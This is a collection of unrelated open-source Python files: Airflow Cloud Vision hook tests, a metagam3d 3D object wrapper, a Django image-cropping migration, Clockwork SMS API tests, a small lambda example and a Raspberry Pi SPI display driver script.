@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
product_set = ProductSet()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err)
update_product_set_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_missing_params_for_constructed_name(
self, location, product_set_id, get_conn
):
# Given
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = product_set
# When
result = self.hook.update_product_set(
location=location,
product_set_id=product_set_id,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product_set)
update_product_set_method.assert_called_once_with(
product_set=ProductSet(name=explicit_ps_name),
metadata=None,
retry=None,
timeout=None,
update_mask=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_set_method = get_conn.return_value.update_product_set
update_product_set_method.return_value = None
explicit_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
)
product_set = ProductSet(name=explicit_ps_name)
template_ps_name = ProductSearchClient.product_set_path(
PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
)
# When
# Location and product_set_id are passed in addition to a ProductSet with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product_set(
location=LOC_ID_TEST,
product_set_id=PRODUCTSET_ID_TEST,
product_set=product_set,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_ps_name,
constructed_name=template_ps_name,
label="ProductSet",
id_label="productset_id",
)
in str(err)
)
update_product_set_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_productset(self, get_conn):
# Given
delete_product_set_method = get_conn.return_value.delete_product_set
delete_product_set_method.return_value = None
name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
# When
response = self.hook.delete_product_set(
location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_explicit_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
        # Reference image ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch(
'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
**{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
)
def test_create_reference_image_autogenerated_id(self, get_conn):
# Given
create_reference_image_method = get_conn.return_value.create_reference_image
# When
result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
        # Reference image ID should be extracted from the API response and returned
assert result == REFERENCE_IMAGE_GEN_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_add_product_to_product_set(self, get_conn):
# Given
add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set
# When
self.hook.add_product_to_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
        # The product and product set resource names should be constructed from the given ids
add_product_to_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
# remove_product_from_product_set
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_remove_product_from_product_set(self, get_conn):
# Given
remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set
# When
self.hook.remove_product_from_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
        # The product and product set resource names should be constructed from the given ids
remove_product_from_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_annotate_image(self, annotator_client_mock):
# Given
annotate_image_method = annotator_client_mock.annotate_image
# When
self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)
# Then
        # The request should be passed through to the annotator client unchanged
annotate_image_method.assert_called_once_with(
request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_batch_annotate_images(self, annotator_client_mock):
# Given
batch_annotate_images_method = annotator_client_mock.batch_annotate_images
# When
self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)
# Then
        # The requests should be passed through to the annotator client unchanged
batch_annotate_images_method.assert_called_once_with(
requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_explicit_id(self, get_conn):
# Given
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCT_ID_TEST
create_product_method.assert_called_once_with(
parent=parent,
product=product,
product_id=PRODUCT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-p-id'
response_product = Product(
name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
# Given
wrong_name = 'wrong_name_not_a_correct_path'
response_product = Product(name=wrong_name)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (wrong name format) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get id from name' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product = None
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name(self, get_conn):
# Given
product = Product()
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
result = self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err)
update_product_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
# When
result = self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
# Location and product_id are passed in addition to a Product with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_p_name,
constructed_name=template_p_name,
label="Product",
id_label="product_id",
)
in str(err)
)
update_product_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_product(self, get_conn):
# Given
delete_product_method = get_conn.return_value.delete_product
delete_product_method.return_value = None
name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
response = self.hook.delete_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(image=DETECT_TEST_IMAGE)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_additional_properties(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_document_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.document_text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(image=DETECT_TEST_IMAGE)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_additional_properties(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.label_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.label_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.safe_search_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
|
apache/incubator-airflow
|
tests/providers/google/cloud/hooks/test_vision.py
|
Python
|
apache-2.0
| 38,031 | 0.003523 |
import _metagam3d
from _metagam3d import AxisAlignment, AlignmentType
from metagam3d.channels import blocking
from metagam3d.scripts import m3d_expr
from concurrence import Tasklet
class LoadError(Exception):
pass
class Object(_metagam3d.Object):
def __init__(self, objid):
_metagam3d.Object.__init__(self, objid)
self._params = {}
def param(self, paramid):
"Get parameter object for given parameter id"
try:
return self._params[paramid]
except KeyError:
pass
param = ObjectParam(self, paramid)
self._params[paramid] = param
return param
def load(self, filename, flags=0):
"Load and return new subobject from file"
objid = _metagam3d._loadObject(filename, self.id, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(self, axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(self.id, axisAlignment, alignment))
def getParam(self, paramid, t):
return self.param(paramid).getValue(t)
def setParam(self, paramid, val):
if type(val) is not _metagam3d.DynamicValue:
if type(val) is not _metagam3d.Variant:
val = _metagam3d.Variant(val)
val = _metagam3d.DynamicValue(val)
self.param(paramid).setValue(val)
def setParam3(self, paramid, x, y, z):
self.setParam(paramid, _metagam3d.Vec3d(x, y, z))
def setParamExpr(self, paramid, expr, till=None):
self.param(paramid).setValue(m3d_expr(expr, till))
def assignMaterial(self, geodeName, ambient=0, diffuse=0, specular=0, emission=0, shininess=0):
_metagam3d._assignMaterial(self.id, geodeName, ambient, diffuse, specular, emission, shininess)
def createConsole(self, cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(self.id, cols, rows, fontSize))
def createLine(self):
return Object(_metagam3d._createLine(self.id))
def destroyAfter(self, t):
Tasklet.new(self._destroyAfter)(t)
def _destroyAfter(self, t):
Tasklet.sleep(t)
self.destroy()
class Console(Object):
def println(self, elements):
line = _metagam3d.ConsoleLine()
for el in elements:
line.add(_metagam3d.ConsoleLineElement(el[0], el[1]))
_metagam3d._printConsole(self.id, line)
class ObjectParam(_metagam3d.ObjectParam):
def __init__(self, obj, paramid):
_metagam3d.ObjectParam.__init__(self, obj.id, paramid)
self._obj = obj
@property
def obj(self):
return self._obj
def load(filename, flags=0):
"Load root level object from file"
objid = _metagam3d._loadObject(filename, 0, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(0, axisAlignment, alignment))
def createConsole(cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(0, cols, rows, fontSize))
def createLine():
return Object(_metagam3d._createLine(0))
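# A minimal usage sketch (hypothetical scene file and parameter ids; the
# _metagam3d engine extension must be importable and initialized):
#
#     scene = load("models/ship.osg")
#     label = scene.createText()
#     label.setParam3(1, 0.0, 2.0, 0.0)           # e.g. a position parameter
#     label.setParamExpr(2, "sin(t)", till=None)  # animate a parameter
#     scene.destroyAfter(60)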
|
JoyTeam/metagam3d
|
python/metagam3d/objects.py
|
Python
|
lgpl-3.0
| 3,360 | 0.004762 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('crop', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='cropping',
field=image_cropping.fields.ImageRatioField('avatar', '200x200', verbose_name='cropping', help_text=None, adapt_rotation=False, size_warning=False, free_crop=False, hide_image_field=False, allow_fullsize=False),
preserve_default=True,
),
]
|
danithaca/berrypicking
|
django/advanced/crop/migrations/0002_auto_20150123_1831.py
|
Python
|
gpl-2.0
| 628 | 0.001592 |
# -*- coding: utf-8 -*-
import unittest
from clockwork import clockwork
from clockwork import clockwork_exceptions
class ApiTests(unittest.TestCase):
api_key = "YOUR_API_KEY_HERE"
def test_should_send_single_message(self):
"""Sending a single SMS with the minimum detail and no errors should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="This is a test message")
response = api.send(sms)
self.assertTrue(response.success)
def test_should_send_single_unicode_message(self):
"""Sending a single SMS with the full GSM character set (apart from ESC and form feed) should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(
to="441234567890",
#Message table copied from http://www.clockworksms.com/doc/reference/faqs/gsm-character-set/
message=u'''@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ'''
u''' !"#¤%&'()*+,-./'''
u'''0123456789:;<=>?'''
u'''¡ABCDEFGHIJKLMNO'''
u'''PQRSTUVWXYZÄÖÑܧ'''
u'''¿abcdefghijklmno'''
u'''pqrstuvwxyzäöñüà'''
u'''€[\]^{|}~'''
,long=True)
response = api.send(sms)
self.assertTrue(response.success)
def test_should_fail_with_no_message(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="")
response = api.send(sms)
self.assertFalse(response.success)
def test_should_fail_with_no_to(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="", message="This is a test message")
response = api.send(sms)
self.assertFalse(response.success)
def test_should_send_multiple_messages(self):
"""Sending multiple sms messages should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="This is a test message 2")
response = api.send([sms1,sms2])
for r in response:
self.assertTrue(r.success)
    def test_should_send_multiple_messages_with_errors(self):
        """Sending multiple SMS messages, one of which has an invalid message, should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="")
response = api.send([sms1, sms2])
self.assertTrue(response[0].success)
self.assertFalse(response[1].success)
def test_should_fail_with_invalid_key(self):
api = clockwork.API("this_key_is_wrong")
sms = clockwork.SMS(to="441234567890", message="This is a test message 1")
self.assertRaises(clockwork_exceptions.ApiException, api.send, sms)
def test_should_be_able_to_get_balance(self):
api = clockwork.API(self.api_key)
balance = api.get_balance()
self.assertEqual('PAYG', balance['account_type'])
if __name__ == "__main__":
unittest.main()
|
mediaburst/clockwork-python
|
tests/clockwork_tests.py
|
Python
|
mit
| 3,369 | 0.004808 |
from math import log
def make_logarithmic_function(base):
return lambda x: log(x, base)
My_LF = make_logarithmic_function(3)
print(My_LF(9))
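# make_logarithmic_function returns a closure that captures `base`, so
# My_LF(9) computes log(9, 3) == 2.0 and the script prints 2.0.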
|
jinzekid/codehub
|
python/数据分析/func_lambda_test.py
|
Python
|
gpl-3.0
| 150 | 0.02 |
# -*- coding: utf-8 -*-
import spidev
import math
def reverse_bit_order(x):
x_reversed = 0x00
if (x & 0x80):
x_reversed |= 0x01
if (x & 0x40):
x_reversed |= 0x02
if (x & 0x20):
x_reversed |= 0x04
if (x & 0x10):
x_reversed |= 0x08
if (x & 0x08):
x_reversed |= 0x10
if (x & 0x04):
x_reversed |= 0x20
if (x & 0x02):
x_reversed |= 0x40
if (x & 0x01):
x_reversed |= 0x80
return x_reversed
"""
x = (((x & 0x55) << 1) | ((x & 0xAA) >> 1)) % 0xFF
x = (((x & 0x33) << 2) | ((x & 0xCC) >> 2)) % 0xFF
return ((x << 4) | (x >> 4)) % 0xFF
"""
def calc_checksum(array):
    total = 0  # renamed from `sum` to avoid shadowing the built-in
    for item in array:
        total += item
    total %= 256
    return (0xFF - total) % 256
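# calc_checksum invariant: the byte-sum of a frame plus its checksum is
# always 0xFF (mod 256); e.g. calc_checksum([0x01, 0x02]) == 0xFC.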
spi = spidev.SpiDev()
spi.open(0, 0)
#
# CS+ data transmit/receive timing setting, type 1
#
# SCK:  ̄ ̄|_| ̄|_| ̄|_| ̄...
# SOp: last bit → <D7> <D6> <D5> ... → first bit
#
spi.mode = 0
#
# SPI clock frequency
# - 500kHz: default
# - 1MHz: OK
# - 2MHz: NG (data corruption occurs)
# => use 1MHz.
#
spi.max_speed_hz = 1000000
#
#
#
data = [ 0x60, 0xDA, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01, ]
brightness = [ 100, 100, 100, 100, 100, 100, 100, 100, ]
# Build one frame
xfer_data = [ 0x01 ] # type = display data
xfer_data.extend(brightness) # display data payload
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
print xfer_data
#
# The Raspberry Pi can only transmit data MSB-first.
# (spidev exposes an spi.lsbfirst member, but it is read-only.)
# => The bits must therefore be reversed before sending.
# [Reference] http://tightdev.net/SpiDev_Doc.pdf
#
xfer_data = map(reverse_bit_order, xfer_data)
print xfer_data
# Send the frame
spi.writebytes(xfer_data)
import os
os.system('sleep 1')
num_to_pattern = [
0xfc, # 0
0x60, # 1
0xda, # 2
0xf2, # 3
0x66, # 4
0xb6, # 5
0xbe, # 6
0xe4, # 7
0xfe, # 8
0xf6, # 9
]
rad = 0.0
while (True):
xfer_data = [ 0x01 ]
brightness[0] = int(math.sin(rad + math.pi/8*0) * 50 + 50)
brightness[1] = int(math.sin(rad + math.pi/8*1) * 50 + 50)
brightness[2] = int(math.sin(rad + math.pi/8*2) * 50 + 50)
brightness[3] = int(math.sin(rad + math.pi/8*3) * 50 + 50)
brightness[4] = int(math.sin(rad + math.pi/8*4) * 50 + 50)
brightness[5] = int(math.sin(rad + math.pi/8*5) * 50 + 50)
brightness[6] = int(math.sin(rad + math.pi/8*6) * 50 + 50)
brightness[7] = int(math.sin(rad + math.pi/8*7) * 50 + 50)
xfer_data.extend(brightness)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
os.system('sleep 0.001')
rad += 0.05 * 2
import datetime as dt
now = dt.datetime.now()
xfer_data = [ 0x00 ]
# data[0] = num_to_pattern[now.year / 1000 % 10]
# data[1] = num_to_pattern[now.year / 100 % 10]
# data[2] = num_to_pattern[now.year / 10 % 10]
